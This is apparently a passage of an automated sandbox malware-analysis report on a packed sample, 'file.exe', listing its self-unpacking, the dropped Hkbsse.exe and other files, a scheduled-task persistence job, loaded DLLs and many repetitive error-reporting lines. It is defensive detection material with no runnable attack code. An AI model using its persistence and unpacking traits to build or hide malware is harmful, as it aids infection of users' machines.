                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: dpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeUnpacked PE file: 23.2.Hkbsse.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeUnpacked PE file: 33.2.Hkbsse.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeUnpacked PE file: 23.2.Hkbsse.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeUnpacked PE file: 33.2.Hkbsse.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042C0A9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0042C0A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041E0D6 push ecx; ret 0_2_0041E0E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DA2C push ecx; ret 0_2_0041DA3F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02964472 pushad ; iretd 0_2_02964482
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02964F8A push esi; retf 0_2_02964F8B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044DDC93 push ecx; ret 0_2_044DDCA6
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0041E0D6 push ecx; ret 23_2_0041E0E9
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0041DA2C push ecx; ret 23_2_0041DA3F
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_02896322 pushad ; iretd 23_2_02896332
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_02896E3A push esi; retf 23_2_02896E3B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0449DC93 push ecx; ret 23_2_0449DCA6
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0041E0D6 push ecx; ret 33_2_0041E0E9
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0041DA2C push ecx; ret 33_2_0041DA3F
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_02B68632 pushad ; iretd 33_2_02B68642
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_02B6914A push esi; retf 33_2_02B6914B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0452DC93 push ecx; ret 33_2_0452DCA6
                Source: file.exeStatic PE information: section name: .text entropy: 7.941071191359724
                Source: Hkbsse.exe.0.drStatic PE information: section name: .text entropy: 7.941071191359724
                Source: random[1].exe.33.drStatic PE information: section name: .text entropy: 7.941071191359724
                Source: 9f93a2.33.drStatic PE information: section name: .text entropy: 7.941071191359724
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeFile created: C:\Users\user\AppData\Local\Temp\3bca58cece\9f93a2Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeFile created: C:\Users\user\AppData\Local\Temp\3bca58cece\9f93a2Jump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\Hkbsse.jobJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041C878 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041C878
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
